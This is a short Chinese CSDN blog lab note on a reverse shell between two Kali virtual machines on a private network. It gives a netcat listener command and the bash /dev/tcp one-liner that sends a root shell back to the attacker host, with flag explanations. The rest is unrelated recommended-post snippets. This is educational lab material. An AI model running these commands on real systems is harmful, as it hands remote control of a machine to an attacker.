2020-08-12

最新推荐文章于 2024-09-25 15:20:18 发布
最新推荐文章于 2024-09-25 15:20:18 发布
阅读量138 收藏
点赞数
文章标签: shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sxdby/article/details/107964690
版权

反弹shell实验

攻击机kali2019:192.168.216.141
在这里插入图片描述靶机kali2020:192.168.216.152
在这里插入图片描述

攻击机kali2019监听6767端口

nc -lvp 6767
 -l 监听,-v 输出交互或出错信息,-p 端口。nc是netcat的简写,可实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口。

在这里插入图片描述

 **bash -i >& /dev/tcp/192.168.216.141/6767 0>&1** 
 
-i interactive。即产生一个交互式的shell(bash)
&>或>& 表示混合输出,即标准输出1 + 错误输出2)
/dev/tcp/IP/PORT 是特殊的设备文件,实际这个文件并不存在,它只是base实现网络请求的一个接口打开这个文件就相当于发出了一个socket调用并建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。
套接字(Socket),就是对网络中不同主机上的应用进程之间进行双向通信的端点的抽象


在这里插入图片描述

攻击机kali2019成功连接,此时已变成靶机kali2020的界面

在这里插入图片描述

我们可以在攻击机使用一些命令(此时回显的内容为靶机kali2020的root文件)
在这里插入图片描述在这里插入图片描述参考文档:https://www.cnblogs.com/iouwenbo/p/11277453.html

sxdby
关注
2020-04-08
qq_41637959的博客
04-08 829
LoadRunner基础使用教程
2020-06-08
qq_44880289的博客
06-08 3233
stm32属性上找不到编写好的hex 因为还没有编译!
2020-03-14
东哥的博客
03-14 1079
<% } %> 这个怎么改成随机
2020-05-31
GJJailang的博客
05-31 966
现在后端不做云计算,大数据,人工智能,底层程序员是不是只剩增删改查了。感觉自己混了两年混成运维了。
2020-06-03
zh1775825464的博客
06-03 991
坚持是一件不容易的事,未来不一定美好,但当下希望要珍惜。昨天看见的一句话。 stay hungry,stay foolish。 这是谁说的呢?
2020-06-07
lyyzxl的博客
06-07 2787
arcgis engine 实现栅格计算器,包括数学运算、逻辑运算、三角函数运算和代数运算。有大佬能帮一下吗?arcgis用10.2版本,环境用vs2015,代码加注释。求大佬。
2020-05-09
wanghuanll的博客
05-09 1306
Dⅹ3.4
2020-04-09
zero_one666的博客
04-09 1358
每日书单 每日书单 1/ There is only one time in a person’s life when he can make a difference. That is the moment. 2/Can coral be kept away from the erosion of stormy waves? It’s nothing more than to bury thei...
2020-07-02
thinkoutresult的博客
07-02 1089
标题java String类型复杂json串如果解析 1.根据json串解析相应的成相应的entity 2. Gson gson = new Gson(); 3. gson.fromJson(String类型复杂的json串,根据json串解析的类entity.class ) 4. 注意解析成entity的类其他的类需要注明是public,如果要张一个entity里面去弄的话 ...
2020-08-28
jdkholmes的博客
08-28 2834
docker CentOS7 新增CUDA10.2 failed to install安装失败 在根据NVIDIA官方下载了runfile之后,第一次sh执行提示失败,查看日志发现是Failed to verify gcc version,然后sh :which:command not found,原因可能是这个镜像里用的是纯净版centos,没什么命令,这里用yum install which先安装which,gcc对应的版本是4.8.5.之后再次安装失败,查看日志发现一堆[INFO]: md5 matc
大数据优化-建设方案2020-08-12.pptx
08-14
大数据优化,按照当前的情况,对数据建设方案进行优化判断,需要有哪些开发和优化成果。重点是第三点,建立隐私保护安全委员会。
JetBrains_补丁_2020-08-12__macwk.com.zip
01-23
JetBrains系列 补丁插件
2020-12-08-刘永鑫1
08-08
中国农业大学国家农业绿色发展研究院 微生物专题报告 (十五)报告题目:宏基因组数据分析的机遇与挑战报 告 人:刘永鑫 工程师报告时间: 2 0 2 0 年 1
4704-2020-08-27101124-1598494284673.exe
09-15
4704-2020-08-27101124-1598494284673.exe4704-2020-08-27101124-1598494284673.exe4704-2020-08-27101124-1598494284673.exe4704-2020-08-27101124-1598494284673.exe4704-2020-08-27101124-1598494284673.exe4704-...
【C高级】有关shell脚本的一些练习
2301_77133426的博客
09-20 652
4、复制/etc/shadow到此目录,并重命名为test。5、把dir2打包并压缩为dir2.tar.xz。4、把当前目录下的所有脚本文件拷贝到dir2中。6、再把dir2.tar.xz移动到dir1中。1、显示/etc/group文件中第五行的内容。2、创建目录/home/ubuntu/copy。5、将当前目录中test的所属用户改为root。6、将test中其他用户的权限改为没有任何权限。3、把当前目录下的所有文件拷贝到dir1中,1、在家目录下创建目录文件,dir。7、解压dir1中的压缩包。
ubuntu安装nvm简易版
CherishTaoTao的博客
09-24 357
【代码】ubuntu安装nvm简易版。
shell脚本编程【1.8】
qq_45740503的博客
09-23 611
shell脚本编程【1.8】
【Linux实践】实验四:Shell实用功能及文件权限
最新发布
Fulling的博客
09-25 717
实验内容 1、使用命令“cat /etc/named.conf”设置为别名named,然后再取消别名。 2、使用echo命令和输出重定向创建文本文件/root/nn,内容是hello,然后再使用追加重定向输入内容为word。 3、使用管道方式分页显示/etc/passwd的内容。 4、分别用文字设定法和数字设定法,对/root/ab文件设置权限,所有者为读取、写入和执行权限,同组用户为读取和写入权限,其他用户没有任何权限。 5、将文件/root/ab所有者更改为用户zhangsan。 6、将目录/root/
shell 遍历目录
abc
09-23 166
这种方法通过一个递归函数来实现目录遍历,会递归地遍历目录及其子目录,并对每一个文件进行操作。请注意,以上是三种常见的遍历目录的方法,根据具体需求和场景的不同,可以选择适合的方法来使用。这种方法将会遍历目录下的所有文件和子目录,但不会递归地进入子目录。shell 遍历目录。
将 Date 类型2020-06-08 00:00:00 的结果截取为 2020-06-08 类型依旧是Date
06-09
将 Date 类型的时间戳 "2020-06-08 00:00:00" 转换为 "2020-06-08" 的字符串格式,可以使用 SimpleDateFormat 对象来实现。示例代码如下: ```java // 原始的时间戳 Date date = new Date("2020-06-08 00:00:00"); ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值